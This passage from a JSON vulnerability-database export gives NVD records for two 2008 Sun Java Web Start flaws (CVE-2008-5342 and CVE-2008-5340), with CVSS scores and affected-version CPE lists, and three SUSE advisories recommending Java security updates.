"cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in the BasicService for Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted downloaded applications to cause local files to be displayed in the browser of the user of the untrusted application via unknown vectors, aka 6767668.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5342", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5342"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5342", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5342", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier allows untrusted JWS applications to gain privileges to access local files or applications via unknown vectors, aka 6727081.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5340", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5340"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5340", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}], "suse": [{"lastseen": "2016-09-04T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The IBM Java 1.4.2 JDK and JRE were brought to Service Release 13 and the IBM JDK and JRE 6 were brought to Service Release 4.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-04-07T14:51:07", "published": "2009-04-07T14:51:07", "id": "SUSE-SA:2009:018", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-04/msg00004.html", "type": "suse", "title": "remote code execution in IBM Java 1.4.2 and 6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:19:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "description": "The IBM Java JRE 5 was brought to Service Release 9 fixing quite a number of security issues and bugs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-01-29T14:08:00", "published": "2009-01-29T14:08:00", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00009.html", "id": "SUSE-SA:2009:007", "title": "local privilege escalation in IBMJava5-JRE,java-1_5_0-ibm", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:22:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Sun Java received several security fixes and was updated to: - Sun Java 1.6.0 to Update 11-b03 - Sun Java 1.5.0 to Update 17 - Sun Java 1.4.2 to Update 19 Numerous security issues such as privilege escalations, and sandbox breakouts were fixed. (CVE-2008-5360, CVE-2008-5359, CVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344, CVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340, CVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354, CVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350, CVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345, CVE-2008-5346)\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-01-09T15:49:38", "published": "2009-01-09T15:49:38", "id": "SUSE-SA:2009:001", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-01/msg00001.html", "type": "suse", "title": "remote code execution in Sun Java", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T21:19:48", "description": "BUGTRAQ ID: 32620,32608\r\nCVE(CAN) ID: 